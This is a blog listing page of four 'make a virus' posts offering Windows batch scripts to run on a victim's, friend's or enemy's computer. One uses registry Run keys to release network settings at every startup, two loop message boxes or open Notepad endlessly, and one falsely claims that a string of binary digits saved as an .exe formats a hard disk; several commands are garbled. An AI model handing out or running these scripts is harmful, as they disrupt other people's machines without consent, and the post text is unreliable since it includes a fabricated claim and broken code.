Latest Update
Loading...

Recent Post

Showing posts with label Viruses. Show all posts
Showing posts with label Viruses. Show all posts
Make a Dangerous Virus Which Can Disable Internet Permanently

Make a Dangerous Virus Which Can Disable Internet Permanently


Today I share a tricks to make a dangerous virus which can disable victim's internet permanently. It's a easy trick so don't worry. Now follow me:

1. Open your notepad. You fool don't ask me where it can found.
2. Copy and paste following code into notepad.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d :windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

3. Save it as anything.bat
4. It's done.
5. Learn It only for educational purpose.
no image

How to Create A Simple Virus

Here is a way on how to create a simple batch file virus Write it in a notepadCycle a message in your friend's computer (code is given below) Type Code:

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as "Anything.BAT" and send it.
Virus To Format Entire Hard Disk

Virus To Format Entire Hard Disk

We have a fast trick to clean your enemy`s PC completely,
Steps are as follows:


    Open Notepad (Windows Key+R and type NOTEPAD and hit enter)


Paste the following code in it:

01001011000111110010010101010101010000011111100000

    Save it as .exe.
    Now execute it on your enemy`s PC and see magic.

Only for educational purpose, not to be misused.
no image

How To Make Harmless Virus

This is step by step tutorial that explains how to make harmless virus that open the notepad file continuously.This is non-destructive virus to your computer system. If you want to have some fun with your friends,drop this cool harmless virus into his pc. . 
1) Launch Notepad

2) Type this code into notepad
Code:


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

3) save as filename.bat for example notepad.bat
Copyright © 2014 Dellucote Network All Right Reserved